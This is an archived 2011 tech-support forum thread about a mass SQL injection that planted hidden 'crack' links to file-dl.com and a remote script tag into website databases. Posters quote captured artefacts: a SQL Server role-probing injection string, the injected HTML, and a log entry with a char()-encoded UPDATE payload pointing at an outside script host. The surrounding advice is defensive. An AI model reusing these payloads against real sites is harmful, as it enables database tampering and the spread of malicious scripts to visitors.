Solved

What's causing "file-dl.com"-link hack?

Posted on 2011-09-13
17
1,023 Views
Last Modified: 2012-05-12
Look at this:
http://www.google.se/search?hl=&q=%22file-dl.com%22+crack&sourceid=navclient-ff&rlz=1B3GGHP_sv___SE434&ie=UTF-8&aq=4h&oq=

A lot of sites that have been hacked with the same hidden link to file-dl.com

What's causing this? How do they do it? How to prevent it?

0
Comment
Question by:Alfahane
  • 6
  • 3
  • 2
  • +4
17 Comments
 

Expert Comment

by:4allSolutions
ID: 36530606
Same question here. I appreciate a quick answer !!
Having problem with one SQL 2008 server, this server is not public accesible . Only some limited range of server can access this. Not all the servers are our server...

Can you tell what your environment is ?
0
 

Author Comment

by:Alfahane
ID: 36530772
SQL 2000
0
 

Author Comment

by:Alfahane
ID: 36530831
Do you have problems with several databases on one server only?
0
 

Expert Comment

by:4allSolutions
ID: 36531296
only one database on one server. The server has 50 databases.
The database is accessed from outside. But dont know for sure it is the external user that cause this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But i want to be sure .....
0
 

Expert Comment

by:jdcrane
ID: 36544222
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)
0
 

Expert Comment

by:Randy_Pr
ID: 36546445
Been having the same issue for 2 days.  Not only seeing this in a sql2008 database but is adding it to files being written on our web server.   Need Help!
0
 

Expert Comment

by:jdcrane
ID: 36548523
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
 
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:


Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
IP: 123.11.252.18(direct:123.11.252.18)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Open in new window

0
 

Expert Comment

by:pysak
ID: 36567705
A websiteof mine has been affected by this issue. I stored the datbase and ensured that ONLY parameterised queries used throughout the website.

Today the website has been targetted again, this time with:
</title><script src=http://dfrgcc.com/ur.php></script>

There is no relevant information in the event log. Does anyone know what is causing this?
0
What Security Threats Are You Missing?

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

 

Expert Comment

by:jdcrane
ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.

Cheers
0
 

Accepted Solution

by:
jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=2 >crack</a>
</title><script src=http://dfrgcc.com/ur.php></script>

Open in new window

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:

1

if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline

2

review yours logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything

3

review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application

4

repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred

5

put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>
0
 

Expert Comment

by:pysak
ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 81.134.4.218 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36573405
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above
0
 
LVL 38

Assisted Solution

by:lherrou
lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.
0
 

Expert Comment

by:nhmedia
ID: 36597918
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.
KR
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36599510
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection,
0
 

Author Closing Comment

by:Alfahane
ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.
0

Featured Post

What Is Threat Intelligence?

Threat intelligence is often discussed, but rarely understood. Starting with a precise definition, along with clear business goals, is essential.

Join & Write a Comment

If you're not part of the solution, you're part of the problem.   Tips on how to secure IoT devices, even the dumbest ones, so they can't be used as part of a DDoS botnet.  Use PRTG Network Monitor as one of the building blocks, to detect unusual…
By this time the large percentage of day-to-day transactions have shifted to mobile banking; here are some overriding areas QAs must investigate while testing mobile banking apps.  
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now